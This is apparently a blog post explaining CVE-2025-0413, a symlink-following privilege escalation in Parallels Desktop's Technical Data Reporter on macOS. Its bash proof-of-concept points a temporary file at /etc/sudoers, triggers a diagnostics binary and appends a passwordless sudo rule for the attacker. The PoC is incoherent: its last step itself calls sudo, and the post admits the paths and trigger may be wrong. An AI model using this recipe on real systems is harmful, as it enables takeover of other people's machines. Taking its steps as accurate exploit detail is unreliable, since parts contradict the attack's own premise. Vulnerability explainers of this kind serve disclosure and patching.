CVE-2025-0413 - Parallels Desktop Local Privilege Escalation via Technical Data Reporter (ZDI-CAN-25014) – Exploit Explained

Parallels Desktop is one of the most popular tools for running virtual machines on macOS. However, in its widespread use, it’s not immune to security flaws. Recently, a serious vulnerability — CVE-2025-0413 — was discovered, affecting the Technical Data Reporter component in Parallels Desktop. This bug can allow a local attacker to escalate their privileges and run code as root. This post breaks down how the vulnerability works, shows a proof-of-concept exploit, and shares links to references with more information.

What is CVE-2025-0413?

CVE-2025-0413 is a local privilege escalation vulnerability in Parallels Desktop. To exploit it, a hacker needs to already have access to the target Mac with a standard (low-privilege) user account. If that’s the case, they can use this bug to get root privileges – the highest level of access on the system.

The bug is in the Technical Data Reporter service. This service collects diagnostic and technical data for Parallels Desktop. However, it doesn’t handle symbolic links (symlinks) securely. An attacker can trick the service into overwriting or changing the permissions on any file they choose – a typical case of *time-of-check to time-of-use* (TOCTOU) vulnerability.

Who discovered CVE-2025-0413?

The bug was discovered and reported by Zero Day Initiative as ZDI-CAN-25014.

- ZDI Advisory for ZDI-CAN-25014 (CVE-2025-0413)

Here’s the basic flow

1. Attacker creates a symlink from a file controlled by them to a system file they want to overwrite or change (for example, /etc/sudoers).

Technical Data Reporter is run automatically or triggered by the attacker.

3. This component performs operations (for example, changing permissions) on files but follows symlinks, so it can be redirected to system files.

Proof-of-Concept Exploit

Below is a simple proof-of-concept (PoC) code. Warning: Do not run this on your production or personal system! It is for educational and research purposes only.

Suppose the attacker wants to give themselves password-less sudo by modifying /etc/sudoers. First, they create a file and a symlink, then trigger the Technical Data Reporter.

Bash PoC Steps

# 1. Create a temporary file we control
touch /tmp/attackerfile

# 2. Remove attackerfile and replace it with a symlink to /etc/sudoers
rm /tmp/attackerfile
ln -s /etc/sudoers /tmp/attackerfile

# 3. Wait for or trigger the Technical Data Reporter to run (this step varies by version/setup; attacker may use sudo or social engineering)
# For PoC, you might try to trigger via:
open "/Applications/Parallels Desktop.app/Contents/MacOS/prl_diagnostics" # Only if accessible

# 4. If permissions of /etc/sudoers are changed (e.g., to world writable), attacker can append a new rule:
echo 'attacker ALL=(ALL) NOPASSWD:ALL' | sudo tee -a /etc/sudoers

> Note: In reality, attacker triggers and times the exploit carefully to match when the service runs and acts on the symlink. Actual service names or paths might differ.

Don’t run untrusted code or scripts on your Mac.

- Use macOS’s built-in security features (Gatekeeper, SIP) and don’t disable them unless you know what you are doing.

References and Further Reading

- Official CVE page
- ZDI Advisory (ZDI-CAN-25014)
- Parallels Desktop
- Apple Developer: Symlink Attacks

Summary

CVE-2025-0413 is a critical local privilege escalation in Parallels Desktop’s Technical Data Reporter. If you’re using Parallels, apply the latest patches and monitor your systems for suspicious activity. Symlink bugs like these remain a common path for attackers to gain system-level access on macOS—learn and stay protected!

Have you patched your Parallels Desktop? Let us know in the comments.

Timeline

Published on: 02/05/2025 00:15:28 UTC